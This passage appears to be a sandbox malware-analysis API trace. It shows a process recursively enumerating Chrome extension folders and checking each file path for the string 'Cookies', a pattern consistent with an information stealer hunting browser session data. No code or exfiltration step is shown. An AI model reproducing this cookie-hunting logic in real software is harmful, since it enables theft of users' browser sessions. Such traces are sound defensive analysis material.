(lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.386] lstrlenW (lpString="\\") returned 1 [0163.386] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.386] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.386] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.386] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.386] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.386] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW") returned 140 [0163.386] lstrlenW (lpString="\\") returned 1 [0163.386] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\messages.json", lpSrch="Cookies") returned 0x0 [0163.386] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.386] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.386] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0163.387] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0163.387] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0163.387] lstrcmpiW (lpString1="_metadata", lpString2=".") returned 1 [0163.387] lstrcmpiW (lpString1="_metadata", lpString2="..") returned 1 [0163.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0163.387] lstrlenW (lpString="\\") returned 1 [0163.387] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.387] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.387] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.387] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.387] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85d166b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="computed_hashes.json", cAlternateFileName="COMPUT~1.JSO")) returned 1 [0163.387] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0163.387] lstrlenW (lpString="\\") returned 1 [0163.388] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\computed_hashes.json", lpSrch="Cookies") returned 0x0 [0163.388] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 1 [0163.388] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata") returned 135 [0163.388] lstrlenW (lpString="\\") returned 1 [0163.388] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\verified_contents.json", lpSrch="Cookies") returned 0x0 [0163.388] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x2b56, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 0 [0163.388] FindClose (in: hFindFile=0x8f9bc0 | out: hFindFile=0x8f9bc0) returned 1 [0163.388] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0163.388] FindClose (in: hFindFile=0x8f9b80 | out: hFindFile=0x8f9b80) returned 1 [0163.388] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName="0.9_0", cAlternateFileName="")) returned 0 [0163.388] FindClose (in: hFindFile=0x8f9b40 | out: hFindFile=0x8f9b40) returned 1 [0163.388] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aohghmighlieiainnegkcijnfilokake", cAlternateFileName="AOHGHM~1")) returned 1 [0163.388] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2=".") returned 1 [0163.388] lstrcmpiW (lpString1="aohghmighlieiainnegkcijnfilokake", lpString2="..") returned 1 [0163.388] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.388] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0163.388] lstrlenW (lpString="\\") returned 1 [0163.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.389] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x916d8210, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x916d8210, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName="..", cAlternateFileName="")) returned 1 [0163.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.389] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.389] FindNextFileW (in: hFindFile=0x8f9b40, lpFindFileData=0x2dee68 | out: lpFindFileData=0x2dee68*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e35d0, dwReserved1=0x913b88, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0163.389] lstrcmpiW (lpString1="0.9_0", lpString2=".") returned 1 [0163.389] lstrcmpiW (lpString1="0.9_0", lpString2="..") returned 1 [0163.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0163.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake") returned 119 [0163.389] lstrlenW (lpString="\\") returned 1 [0163.389] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.389] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0163.389] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.389] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.389] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xc8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0163.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.389] lstrlenW (lpString="\\") returned 1 [0163.389] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_128.png", lpSrch="Cookies") returned 0x0 [0163.389] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86833250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0163.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.389] lstrlenW (lpString="\\") returned 1 [0163.389] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\icon_16.png", lpSrch="Cookies") returned 0x0 [0163.390] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0163.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.390] lstrlenW (lpString="\\") returned 1 [0163.390] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.html", lpSrch="Cookies") returned 0x0 [0163.390] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86702750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xfe051a00, ftLastWriteTime.dwHighDateTime=0x1d03f5d, nFileSizeHigh=0x0, nFileSizeLow=0x5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0163.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.390] lstrlenW (lpString="\\") returned 1 [0163.390] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\main.js", lpSrch="Cookies") returned 0x0 [0163.390] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86727140, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0163.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.390] lstrlenW (lpString="\\") returned 1 [0163.390] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\manifest.json", lpSrch="Cookies") returned 0x0 [0163.390] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0163.390] lstrcmpiW (lpString1="_locales", lpString2=".") returned 1 [0163.390] lstrcmpiW (lpString1="_locales", lpString2="..") returned 1 [0163.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.390] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0") returned 125 [0163.390] lstrlenW (lpString="\\") returned 1 [0163.391] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.391] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86702750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86702750, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.391] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.391] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.391] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ar", cAlternateFileName="")) returned 1 [0163.391] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0163.391] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0163.391] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.391] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.391] lstrlenW (lpString="\\") returned 1 [0163.392] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.392] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.392] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.392] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.392] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar") returned 137 [0163.392] lstrlenW (lpString="\\") returned 1 [0163.392] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ar\\messages.json", lpSrch="Cookies") returned 0x0 [0163.392] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xf6, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.392] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.392] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="bg", cAlternateFileName="")) returned 1 [0163.392] lstrcmpiW (lpString1="bg", lpString2=".") returned 1 [0163.392] lstrcmpiW (lpString1="bg", lpString2="..") returned 1 [0163.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0163.392] lstrlenW (lpString="\\") returned 1 [0163.392] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.392] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0163.393] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.393] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.393] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.393] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 